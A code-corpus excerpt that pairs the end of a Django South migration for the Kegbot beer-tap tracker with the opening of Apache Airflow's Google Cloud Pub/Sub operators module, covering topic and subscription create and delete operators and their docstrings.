'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'kegs'", 'to': "orm['core.KegbotSite']"}),
'size': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegSize']"}),
'startdate': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['beerdb.BeerType']"})
},
'core.kegbotsite': {
'Meta': {'object_name': 'KegbotSite'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'core.kegsessionchunk': {
'Meta': {'unique_together': "(('session', 'keg'),)", 'object_name': 'KegSessionChunk'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'keg_session_chunks'", 'null': 'True', 'to': "orm['core.Keg']"}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'keg_chunks'", 'to': "orm['core.DrinkingSession']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.kegsize': {
'Meta': {'object_name': 'KegSize'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'volume_ml': ('django.db.models.fields.FloatField', [], {})
},
'core.kegstats': {
'Meta': {'object_name': 'KegStats'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stats'", 'unique': 'True', 'to': "orm['core.Keg']"}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'stats': ('pykeg.core.jsonfield.JSONField', [], {'default': "'{}'"})
},
'core.kegtap': {
'Meta': {'object_name': 'KegTap'},
'current_keg': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Keg']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_tick_delta': ('django.db.models.fields.PositiveIntegerField', [], {'default': '100'}),
'meter_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'ml_per_tick': ('django.db.models.fields.FloatField', [], {'default': '0.45454545454545453'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'temperature_sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.ThermoSensor']", 'null': 'True', 'blank': 'True'})
},
'core.relaylog': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'RelayLog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'relaylogs'", 'to': "orm['core.KegbotSite']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'time': ('django.db.models.fields.DateTimeField', [], {})
},
'core.sessionchunk': {
'Meta': {'unique_together': "(('session', 'user', 'keg'),)", 'object_name': 'SessionChunk'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'session_chunks'", 'null': 'True', 'to': "orm['core.Keg']"}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'chunks'", 'to': "orm['core.DrinkingSession']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'session_chunks'", 'null': 'True', 'to': "orm['auth.User']"}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.sessionstats': {
'Meta': {'object_name': 'SessionStats'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stats'", 'unique': 'True', 'to': "orm['core.DrinkingSession']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'stats': ('pykeg.core.jsonfield.JSONField', [], {'default': "'{}'"})
},
'core.systemevent': {
'Meta': {'object_name': 'SystemEvent'},
'drink': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['core.Drink']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['core.Keg']"}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['core.DrinkingSession']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': "orm['auth.User']"}),
'when': ('django.db.models.fields.DateTimeField', [], {})
},
'core.thermolog': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'Thermolog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.ThermoSensor']"}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thermologs'", 'to': "orm['core.KegbotSite']"}),
'temp': ('django.db.models.fields.FloatField', [], {}),
'time': ('django.db.models.fields.DateTimeField', [], {})
},
'core.thermosensor': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'ThermoSensor'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nice_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'raw_name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thermosensors'", 'to': "orm['core.KegbotSite']"})
},
'core.thermosummarylog': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'ThermoSummaryLog'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_temp': ('django.db.models.fields.FloatField', [], {}),
'mean_temp': ('django.db.models.fields.FloatField', [], {}),
'min_temp': ('django.db.models.fields.FloatField', [], {}),
'num_readings': ('django.db.models.fields.PositiveIntegerField', [], {}),
'period': ('django.db.models.fields.CharField', [], {'default': "'daily'", 'max_length': '64'}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.ThermoSensor']"}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thermosummarylogs'", 'to': "orm['core.KegbotSite']"})
},
'core.userpicture': {
'Meta': {'object_name': 'UserPicture'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'core.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'gender': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mugshot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.UserPicture']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'weight': ('django.db.models.fields.FloatField', [], {})
},
'core.usersessionchunk': {
'Meta': {'unique_together': "(('session', 'user'),)", 'object_name': 'UserSessionChunk'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_chunks'", 'to': "orm['core.DrinkingSession']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'user_session_chunks'", 'null': 'True', 'to': "orm['auth.User']"}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.userstats': {
'Meta': {'object_name': 'UserStats'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.KegbotSite']"}),
'stats': ('pykeg.core.jsonfield.JSONField', [], {'default': "'{}'"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stats'", 'unique': 'True', 'to': "orm['auth.User']"})
}
}
complete_apps = ['core']
|
gpl-2.0
| -7,894,830,673,467,085,000 | 78.207831 | 179 | 0.541088 | false |
apache/airflow
|
airflow/providers/google/cloud/operators/pubsub.py
|
2
|
40994
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains Google PubSub operators."""
import warnings
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
from google.api_core.retry import Retry
from google.cloud.pubsub_v1.types import (
DeadLetterPolicy,
Duration,
ExpirationPolicy,
MessageStoragePolicy,
PushConfig,
ReceivedMessage,
RetryPolicy,
)
from airflow.models import BaseOperator
from airflow.providers.google.cloud.hooks.pubsub import PubSubHook
class PubSubCreateTopicOperator(BaseOperator):
"""Create a PubSub topic.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubCreateTopicOperator`
By default, if the topic already exists, this operator will
not cause the DAG to fail. ::
with DAG('successful DAG') as dag:
(
PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic')
>> PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic')
)
The operator can be configured to fail if the topic already exists. ::
with DAG('failing DAG') as dag:
(
PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic')
>> PubSubTopicCreateOperator(project='my-project',
topic='my_new_topic',
fail_if_exists=True)
)
Both ``project`` and ``topic`` are templated so you can use
variables in them.
:param project_id: Optional, the Google Cloud project ID where the topic will be created.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param topic: the topic to create. Do not include the
full topic path. In other words, instead of
``projects/{project}/topics/{topic}``, provide only
``{topic}``. (templated)
:type topic: str
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param labels: Client-assigned labels; see
https://cloud.google.com/pubsub/docs/labels
:type labels: Dict[str, str]
:param message_storage_policy: Policy constraining the set
of Google Cloud regions where messages published to
the topic may be stored. If not present, then no constraints
are in effect.
:type message_storage_policy:
Union[Dict, google.cloud.pubsub_v1.types.MessageStoragePolicy]
:param kms_key_name: The resource name of the Cloud KMS CryptoKey
to be used to protect access to messages published on this topic.
The expected format is
``projects/*/locations/*/keyRings/*/cryptoKeys/*``.
:type kms_key_name: str
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
    :type metadata: Sequence[Tuple[str, str]]
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
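    A sketch using the optional storage-policy and KMS parameters (the region
    list and key path below are illustrative assumptions, not defaults)::
        create_topic = PubSubCreateTopicOperator(
            task_id='create_topic',
            project_id='my-project',
            topic='my-topic',
            message_storage_policy={'allowed_persistence_regions': ['europe-west1']},
            kms_key_name='projects/my-project/locations/global/keyRings/my-kr/cryptoKeys/my-key',
            dag=dag)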
"""
template_fields = [
'project_id',
'topic',
'impersonation_chain',
]
ui_color = '#0273d4'
def __init__(
self,
*,
topic: str,
project_id: Optional[str] = None,
fail_if_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
labels: Optional[Dict[str, str]] = None,
        message_storage_policy: Optional[Union[Dict, MessageStoragePolicy]] = None,
kms_key_name: Optional[str] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.fail_if_exists = fail_if_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.labels = labels
self.message_storage_policy = message_storage_policy
self.kms_key_name = kms_key_name
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Creating topic %s", self.topic)
hook.create_topic(
project_id=self.project_id,
topic=self.topic,
fail_if_exists=self.fail_if_exists,
labels=self.labels,
message_storage_policy=self.message_storage_policy,
kms_key_name=self.kms_key_name,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Created topic %s", self.topic)
class PubSubCreateSubscriptionOperator(BaseOperator):
"""Create a PubSub subscription.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubCreateSubscriptionOperator`
By default, the subscription will be created in ``topic_project``. If
``subscription_project`` is specified and the Google Cloud credentials allow, the
Subscription can be created in a different project from its topic.
By default, if the subscription already exists, this operator will
not cause the DAG to fail. However, the topic must exist in the project. ::
with DAG('successful DAG') as dag:
(
PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription')
>> PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription')
)
The operator can be configured to fail if the subscription already exists.
::
with DAG('failing DAG') as dag:
(
PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription')
>> PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic',
subscription='my-subscription', fail_if_exists=True)
)
    Finally, ``subscription`` is not required. If not passed, the operator will
    generate a universally unique identifier for the subscription's name. ::
with DAG('DAG') as dag:
(
PubSubSubscriptionCreateOperator(
topic_project='my-project', topic='my-topic')
)
    ``topic_project``, ``topic``, ``subscription``, and
    ``subscription_project`` are templated so you can use variables in them.
:param project_id: Optional, the Google Cloud project ID where the topic exists.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
    :param topic: the topic to which the subscription will be attached. Do not
        include the full topic path. In other words, instead of
        ``projects/{project}/topics/{topic}``, provide only
        ``{topic}``. (templated)
:type topic: str
:param subscription: the Pub/Sub subscription name. If empty, a random
name will be generated using the uuid module
:type subscription: str
:param subscription_project_id: the Google Cloud project ID where the subscription
        will be created. If empty, ``project_id`` will be used.
:type subscription_project_id: str
:param ack_deadline_secs: Number of seconds that a subscriber has to
acknowledge each message pulled from the subscription
:type ack_deadline_secs: int
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param push_config: If push delivery is used with this subscription,
this field is used to configure it. An empty ``pushConfig`` signifies
that the subscriber will pull and ack messages using API methods.
:type push_config: Union[Dict, google.cloud.pubsub_v1.types.PushConfig]
:param retain_acked_messages: Indicates whether to retain acknowledged
messages. If true, then messages are not expunged from the subscription's
backlog, even if they are acknowledged, until they fall out of the
``message_retention_duration`` window. This must be true if you would
like to Seek to a timestamp.
:type retain_acked_messages: bool
:param message_retention_duration: How long to retain unacknowledged messages
in the subscription's backlog, from the moment a message is published. If
``retain_acked_messages`` is true, then this also configures the
retention of acknowledged messages, and thus configures how far back in
time a ``Seek`` can be done. Defaults to 7 days. Cannot be more than 7
days or less than 10 minutes.
:type message_retention_duration: Union[Dict, google.cloud.pubsub_v1.types.Duration]
:param labels: Client-assigned labels; see
https://cloud.google.com/pubsub/docs/labels
:type labels: Dict[str, str]
:param enable_message_ordering: If true, messages published with the same
ordering_key in PubsubMessage will be delivered to the subscribers in the order
in which they are received by the Pub/Sub system. Otherwise, they may be
delivered in any order.
:type enable_message_ordering: bool
:param expiration_policy: A policy that specifies the conditions for this
subscription’s expiration. A subscription is considered active as long as any
connected subscriber is successfully consuming messages from the subscription or
is issuing operations on the subscription. If expiration_policy is not set,
a default policy with ttl of 31 days will be used. The minimum allowed value for
expiration_policy.ttl is 1 day.
    :type expiration_policy: Union[Dict, google.cloud.pubsub_v1.types.ExpirationPolicy]
:param filter_: An expression written in the Cloud Pub/Sub filter language. If
non-empty, then only PubsubMessages whose attributes field matches the filter are
delivered on this subscription. If empty, then no messages are filtered out.
:type filter_: str
:param dead_letter_policy: A policy that specifies the conditions for dead lettering
messages in this subscription. If dead_letter_policy is not set, dead lettering is
disabled.
:type dead_letter_policy: Union[Dict, google.cloud.pubsub_v1.types.DeadLetterPolicy]
:param retry_policy: A policy that specifies how Pub/Sub retries message delivery
for this subscription. If not set, the default retry policy is applied. This
generally implies that messages will be retried as soon as possible for healthy
subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline
exceeded events for a given message.
:type retry_policy: Union[Dict, google.cloud.pubsub_v1.types.RetryPolicy]
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
    :type metadata: Sequence[Tuple[str, str]]
:param topic_project: (Deprecated) the Google Cloud project ID where the topic exists
:type topic_project: str
:param subscription_project: (Deprecated) the Google Cloud project ID where the subscription
will be created. If empty, ``topic_project`` will be used.
:type subscription_project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
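    A sketch combining a few of the optional policy parameters above (the dict
    field values are illustrative assumptions; check the Pub/Sub API reference
    for the exact policy schemas)::
        create_sub = PubSubCreateSubscriptionOperator(
            task_id='create_subscription',
            project_id='my-project',
            topic='my-topic',
            subscription='my-subscription',
            ack_deadline_secs=30,
            retry_policy={'minimum_backoff': {'seconds': 10},
                          'maximum_backoff': {'seconds': 600}},
            dag=dag)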
"""
template_fields = [
'project_id',
'topic',
'subscription',
'subscription_project_id',
'impersonation_chain',
]
ui_color = '#0273d4'
def __init__(
self,
*,
topic: str,
project_id: Optional[str] = None,
subscription: Optional[str] = None,
subscription_project_id: Optional[str] = None,
ack_deadline_secs: int = 10,
fail_if_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
push_config: Optional[Union[Dict, PushConfig]] = None,
retain_acked_messages: Optional[bool] = None,
message_retention_duration: Optional[Union[Dict, Duration]] = None,
labels: Optional[Dict[str, str]] = None,
enable_message_ordering: bool = False,
expiration_policy: Optional[Union[Dict, ExpirationPolicy]] = None,
filter_: Optional[str] = None,
dead_letter_policy: Optional[Union[Dict, DeadLetterPolicy]] = None,
retry_policy: Optional[Union[Dict, RetryPolicy]] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
topic_project: Optional[str] = None,
subscription_project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if topic_project:
warnings.warn(
"The topic_project parameter has been deprecated. You should pass "
"the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = topic_project
if subscription_project:
warnings.warn(
"The project_id parameter has been deprecated. You should pass "
"the subscription_project parameter.",
DeprecationWarning,
stacklevel=2,
)
subscription_project_id = subscription_project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.subscription = subscription
self.subscription_project_id = subscription_project_id
self.ack_deadline_secs = ack_deadline_secs
self.fail_if_exists = fail_if_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.push_config = push_config
self.retain_acked_messages = retain_acked_messages
self.message_retention_duration = message_retention_duration
self.labels = labels
self.enable_message_ordering = enable_message_ordering
self.expiration_policy = expiration_policy
self.filter_ = filter_
self.dead_letter_policy = dead_letter_policy
self.retry_policy = retry_policy
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> str:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Creating subscription for topic %s", self.topic)
result = hook.create_subscription(
project_id=self.project_id,
topic=self.topic,
subscription=self.subscription,
subscription_project_id=self.subscription_project_id,
ack_deadline_secs=self.ack_deadline_secs,
fail_if_exists=self.fail_if_exists,
push_config=self.push_config,
retain_acked_messages=self.retain_acked_messages,
message_retention_duration=self.message_retention_duration,
labels=self.labels,
enable_message_ordering=self.enable_message_ordering,
expiration_policy=self.expiration_policy,
filter_=self.filter_,
dead_letter_policy=self.dead_letter_policy,
retry_policy=self.retry_policy,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Created subscription for topic %s", self.topic)
return result
class PubSubDeleteTopicOperator(BaseOperator):
"""Delete a PubSub topic.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubDeleteTopicOperator`
By default, if the topic does not exist, this operator will
not cause the DAG to fail. ::
with DAG('successful DAG') as dag:
(
PubSubTopicDeleteOperator(project='my-project',
topic='non_existing_topic')
)
The operator can be configured to fail if the topic does not exist. ::
with DAG('failing DAG') as dag:
(
                PubSubTopicDeleteOperator(project='my-project',
topic='non_existing_topic',
fail_if_not_exists=True)
)
Both ``project`` and ``topic`` are templated so you can use
variables in them.
:param project_id: Optional, the Google Cloud project ID in which to work (templated).
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param topic: the topic to delete. Do not include the
full topic path. In other words, instead of
``projects/{project}/topics/{topic}``, provide only
``{topic}``. (templated)
:type topic: str
:param fail_if_not_exists: If True and the topic does not exist, fail
the task
:type fail_if_not_exists: bool
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
    :type metadata: Sequence[Tuple[str, str]]
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'topic',
'impersonation_chain',
]
ui_color = '#cb4335'
def __init__(
self,
*,
topic: str,
project_id: Optional[str] = None,
fail_if_not_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.fail_if_not_exists = fail_if_not_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Deleting topic %s", self.topic)
hook.delete_topic(
project_id=self.project_id,
topic=self.topic,
fail_if_not_exists=self.fail_if_not_exists,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Deleted topic %s", self.topic)
class PubSubDeleteSubscriptionOperator(BaseOperator):
"""Delete a PubSub subscription.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubDeleteSubscriptionOperator`
By default, if the subscription does not exist, this operator will
not cause the DAG to fail. ::
with DAG('successful DAG') as dag:
(
PubSubSubscriptionDeleteOperator(project='my-project',
subscription='non-existing')
)
    The operator can be configured to fail if the subscription does not exist.
::
with DAG('failing DAG') as dag:
(
PubSubSubscriptionDeleteOperator(
project='my-project', subscription='non-existing',
fail_if_not_exists=True)
)
``project``, and ``subscription`` are templated so you can use
variables in them.
:param project_id: Optional, the Google Cloud project ID in which to work (templated).
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param subscription: the subscription to delete. Do not include the
full subscription path. In other words, instead of
``projects/{project}/subscription/{subscription}``, provide only
``{subscription}``. (templated)
:type subscription: str
:param fail_if_not_exists: If True and the subscription does not exist,
fail the task
:type fail_if_not_exists: bool
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param retry: (Optional) A retry object used to retry requests.
If None is specified, requests will not be retried.
:type retry: google.api_core.retry.Retry
:param timeout: (Optional) The amount of time, in seconds, to wait for the request
to complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:type timeout: float
:param metadata: (Optional) Additional metadata that is provided to the method.
    :type metadata: Sequence[Tuple[str, str]]
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'subscription',
'impersonation_chain',
]
ui_color = '#cb4335'
def __init__(
self,
*,
subscription: str,
project_id: Optional[str] = None,
fail_if_not_exists: bool = False,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, str]]] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
